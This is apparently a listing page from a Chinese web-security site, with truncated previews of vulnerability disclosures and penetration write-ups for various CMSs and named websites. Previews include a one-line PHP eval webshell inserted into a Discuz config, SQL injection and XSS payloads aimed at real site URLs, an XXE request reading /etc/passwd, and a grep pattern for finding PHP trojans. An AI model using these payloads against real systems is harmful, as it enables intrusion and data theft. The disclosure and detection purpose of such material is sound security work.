新浪微博微女郎CSRF漏洞 - 网站安全 - 自学php关注热度:35

新浪微博某处CSRF漏洞，可能导致蠕虫蔓延，在未经用户同意的情况下发布微博/批量加关注详细说明：在接受POST和GET的信息的时候，未对POST来路(Referer)进行验证，同时也没有在POST的信息..[详情]

800app的某上传引发的血案 - 网站安全 - 自学php关注热度:76

不知大家认不认同云？云安全问题是不是会引起很多血案？值得深思。。。详细说明：首先，我申请个试用帐号，然后进后台看了一，看看是否存在安全问题。http://www.800app.com/简单看了..[详情]

Discuz全版本数据库备份文件泄漏及修复 - 网站安关注热度:58

Windows short filenames造成的Discuz数据库备份文件泄漏.只适用于跑在windows下的apache下的DZ!不仅仅是DZ存在这个问题哦.看详细之前请去自行了解下Windows short filenames这个漏洞的详情!首先.了解..[详情]

phpmywind多个鸡肋漏洞 - 网站安全 - 自学php关注热度:29

upload_filemgr_dir.php?phpif(empty($dirname)or$dirname==#39;uploads/#39;){$dirname=#39;uploads/#39;;$dirhigh=#39;javascript:;#39;;$dirtext=#39;上传根目录#39;;}else{$dirarr=explode(#39;/.....[详情]

Songcms Sql注入漏洞及修复 - 网站安全 - 自学php关注热度:28

过滤不严谨呀！ 导致SQL注入！if($WebOpening==0) die(htmlspecialchars_decode($WebMaintenanceText));$QUERY = preg_replace(/[\\\:\*\?\\#39;\~\(\)\[\]\{\}\s\$]/,#39;#39;,$_SERVER[#39;QUERY.....[详情]

Stcms sql注射及修复 - 网站安全 - 自学php关注热度:11

任意sql语句执行case #39;list#39;: $totalNum = $mysql-numTable(member, $where); $pageNum = 20; $totalPage = intval($totalNum/$pageNum) == $totalNum/$pageNum ? $totalNum/$pageNum.....[详情]

ESPCMS SQL注入漏洞 - 网站安全 - 自学php关注热度:34

$membercookieview = $this-member_cookieview(); if (!empty($membercookieview[#39;userid#39;]) !empty($membercookieview[#39;username#39;])) { $rsMember = $this-get_member(null, $.....[详情]

grails的安全策略 - 网站安全 - 自学php关注热度:29

1、spring-security-core2、spring-security-ui3、famfamfam、mail、jquery-ui、jquery、webxml4、cal-client修改spring-security-ui中UserController和RegisterController中关于password加密的那部分添加以下参.....[详情]

KingCmsSQL注入加+代码执行 - 网站安全 - 自学php关注热度:32

详细说明：function kc_pageLoad(){if (KC_MAGIC_QUOTES_GPC){$_GET=kc_stripslashes_array($_GET);$_POST=kc_stripslashes_array($_POST);$_COOKIE=kc_stripslashes_array($_COOKIE);$array=array(#39;PHP_S.....[详情]

记事狗任意文件删除 - 网站安全 - 自学php关注热度:31

前面有一篇任意文件删除了：记事狗盲注及任意文件删除利用条件：1.仅限于windows主机,linux无效（至少我本机就不行）2.已注册用户3.需要删除的文件可读写在modules/ajax/event.mod.php中www...[详情]

金山词霸注射+本地文件包含漏洞+绝对路径泄露关注热度:42

爱词霸资讯后台管理系统登陆框SQL注入http://news.iciba.com/admin/index.php?mod=loginact=ajaxloginusername=#39;or#39;#39;=#39;#39;or#39;#39;=#39;pwd=#39;or#39;#39;=#39;#39;or#39;#39.....[详情]

discuz的php防止sql注入函数 - 网站安全 - 自学php关注热度:29

$magic_quotes_gpc = get_magic_quotes_gpc();@extract(daddslashes($_COOKIE));@extract(daddslashes($_POST));@extract(daddslashes($_GET));if(!$magic_quotes_gpc) {$_FILES = daddslashes($_FILES);}w.....[详情]

弥补fckeditor上传漏洞_防止上传非法文件 - 网站安关注热度:30

fckeditor上传漏洞修复弥补fckeditor上传漏洞：防止上传非法文件 增加登录判断，需要的朋友可以参考下fckeditor\editor\filemanager\connectors\asp 目录下 两个文件connector.asp upload.asp 里判断是否登..[详情]

小技巧突破CDN查询网站真实IP - 网站安全 - 自学关注热度:19

为网站安全爱好者及从业人员提供网站程序漏洞分析,安全防范等web安全技术文章..[详情]

历时5月渗透大站两枚 - 网站安全 - 自学php关注热度:20

在腾讯2009年安全技术峰会上我曾经提出一个观点：墨菲定律：如果它能够被黑客攻破，它就将被攻破。对于一个黑客来说，他要黑一个企业，仅仅是时间上的 问题，总之是成本上的问题..[详情]

discuz X2.5后台拿shell及修复 - 网站安全 - 自学php关注热度:26

有管理员帐号及密码。直接在UCenter IP 地址:里面插入一句话xxoo\\);eval($_POST[a])?;// 就ok 然后菜刀连接http://www.2cto.com /config/config_ucenter.php密码a ，测试通过..[详情]

阿里校园多个漏洞及修复 - 网站安全 - 自学php关注热度:21

SQL注入，跨站什么的。。详细说明：1.SQL注入注入URL：http://www.alixiaoyuan.com/index.php?app=campusgroupbuycateID=1注入参数：cateID2.跨站http://wh.alixiaoyuan.com/?app=buycity_id=%22%20onmouseove.....[详情]

Linux shell快速查找PHP木马 - 网站安全 - 自学php关注热度:18

一句话查找 PHP 木马find ./ -name *.php |xargs egrep phpspy|c99sh|milw0rm|eval\(gunerpress|eval\(base64_decoolcode|spider_bc /tmp/php.txtgrep -r --include=*.php #39;[^a-z]eval($_P.....[详情]

以学校OA考勤系统服务器为目标的一次渗透检测关注热度:21

本人所在的是重庆某某软件学校，学校一共4台内部服务器，IP结构：10.0.0.2、10.0.0.4、10.0.0.5、10.0.0.103去年的时候由于10.0.0.103的sa为弱口令123456，被俺日下，后来通知校方处理了（确实处..[详情]

安全狗iis 6.0 ; 截断解析突破 - 网站安全 - 自学关注热度:27

众所周知web安全狗是国内比较流氓的软件，劫持模块，坑爹的删不了。除了这些流氓行为之外，还恬不知耻的做了各种没有用的限制！比如说注入安全狗本身对xx.asp?id=69 and 1=1和 xx.asp?..[详情]

方卡ISite企业建站系统V1.1.9上传绕过 - 网站安全关注热度:37

可以得到ewebedit。转而可以得到SHELL。开始只是得到了一个方卡在线的后台。可以修改上传类别。可惜有保护。改过了就又恢复了继续看。是一个新的网址后台管理软件。百度过了。几乎..[详情]

网站九大敌人 别给Web应用漏洞可趁之机 - 网站安关注热度:15

过去，网站的内容大多是静态的。随着HTML5的流行，Web应用进入一个崭新阶段，内容的动态化和实时共享让阻拦不良内容或恶意软件变得更加复杂，公司和个人的重要信息也被暴于极为危..[详情]

丢掉NC，介绍一种新的上传shell文件的方法 - 网站关注热度:28

www.2cto.com:以前的老文章了，站里没有，补上。今日低调在知道区发帖求助，说后台地址，用户名和密码都有，拿不到shell。不久wbxym和ljb17就分别2种办法上传好了shell。wbxym的方法很简单..[详情]

JBoss默认身份验证漏洞利用及修复 - 网站安全 -关注热度:46

JBoss应用服务器是一个开源的基于Java EE应用服务器。 JBoss被广泛使用，许多组织的web服务器都是由JBoss部署的。JBoss已经爆出过很多漏洞和错误，本文将分享JBoss应用程序默认身份验证漏..[详情]

客客族威客系统后台编辑模板处可写入shell - 网站关注热度:18

1、通过各种手段进入后台2、站长工具-模板标签-模板管理-编辑3、选择任意一个文件编辑之后你看到的是这个样子4、进行如图所示的修改，内容可以是大马也可以使小马，模板路径为相..[详情]

艾格中国（Etam）zend framework任意文件读取漏洞及关注热度:69

URL：http://www.etam.com.cn/api/xmlrpcpost数据:?xml version=1.0?!DOCTYPE foo [!ELEMENT methodName ANY !ENTITY xxe SYSTEM file:///etc/passwd ]methodCallmethodNamexxe;/me.....[详情]

记一次有趣的提权 - 网站安全 - 自学php关注热度:105

Shell是双面大牛给的，在我打算看《轩辕剑》的时候，面面大牛说我无聊就让我看看提权，俺立马没了兴趣，为啥，双面大牛都没有搞定的，我能搞定吗..但是发现这个网速看电影真的没..[详情]

YourArcadeScript 2.4 (index.php内id参数) SQL注射 - 网站安关注热度:19

YourArcadeScript 2.4 SQLi Vulnerability影响版本: 2.4作者: DaOne [LCA]下载地址: http://www.yourarcadescript.com测试http://www.2cto.com /index.php?act=catid=[Error Based Injection]致谢 :.....[详情]

Symantec Web Gateway <= 5.0.3.18任意密码修改(MSF)关注热度:17

### @_Kc57# Symantec Web Gateway = 5.0.3.18 Arbitrary Password Change##require #39;msf/core#39;class Metasploit3 Msf::Auxiliary include Msf::Exploit::Remote::HttpClient def i.....[详情]

奇艺分站nginx解析+xss - 网站安全 - 自学php关注热度:23

http://vote.video.qiyi.com/survey/static/qiyi_logo.png/test.php nginx解析漏洞http://list.iqiyi.com/?1%3C/title%3E1%22/%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E xsshttp://top.iqiyi.com/index/t.....[详情]